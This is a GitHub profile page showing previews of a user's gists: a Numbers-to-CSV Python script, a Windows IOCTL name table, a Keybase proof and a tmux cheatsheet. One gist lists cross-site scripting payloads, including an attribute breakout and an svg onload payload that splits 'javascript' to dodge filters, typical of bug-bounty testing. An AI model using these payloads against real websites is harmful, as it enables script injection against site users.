Skip to content

Instantly share code, notes, and snippets.

View mmssr's full-sized avatar

beep boop mmssr

View GitHub Profile
## requires https://pypi.org/project/numbers-parser/
## quick convert apple numbers format to csv
from numbers_parser import Document
import csv
import sys
import os
def numbers_to_csv(input_file, output_file):
doc = Document(input_file)
sheet = doc.sheets[0]
@mmssr
mmssr / ioctl_names.cpp
Created February 23, 2026 17:37 — forked from daaximus/ioctl_names.cpp
Most IOCTLs mapped to their code names
typedef struct _ioctl_t
{
const char* ioctl_name;
uint64_t ctl_code;
} ioctl_t;
// This would likely be better used in some unordered map. This is just a temporary data structure for testing resolution.
//
// Results from NtDeviceIoControlFile hook:
// utweb.exe (14916) :: NtDeviceIoControlFile( 0x65c (\Device\Afd), 0x694, 0x0000000000000000, 0x0000000000000000, 0x00000000044DEE90, 0x12024 (IOCTL_AFD_SELECT), 0x0000000004A3FC18, 0x34, 0x0000000004A3FC18, 0x34 )
" onfocus="alert(1)" name="bounty
(Append #bounty to the URL and enjoy your zero interaction XSS )
<svg/onload=location=`javas`+`cript:ale`+`rt%2`+`81%2`+`9`;//
# Internet Explorer, Edge
<svg><script>alert(1)<p>
# Firefox
@mmssr
mmssr / keybase.md
Created September 10, 2019 18:16
keybase.md

Keybase proof

I hereby claim:

  • I am mmssr on github.
  • I am messer (https://keybase.io/messer) on keybase.
  • I have a public key ASAcDEIQAtvNJr0mybOw36h0HiVbzUSmS9V_fvFr4VeL9wo

To claim this, I am signing this object:

@mmssr
mmssr / tmux-cheatsheet.markdown
Created April 10, 2019 17:18 — forked from MohamedAlaa/tmux-cheatsheet.markdown
tmux shortcuts & cheatsheet

tmux shortcuts & cheatsheet

start new:

tmux

start new with session name:

tmux new -s myname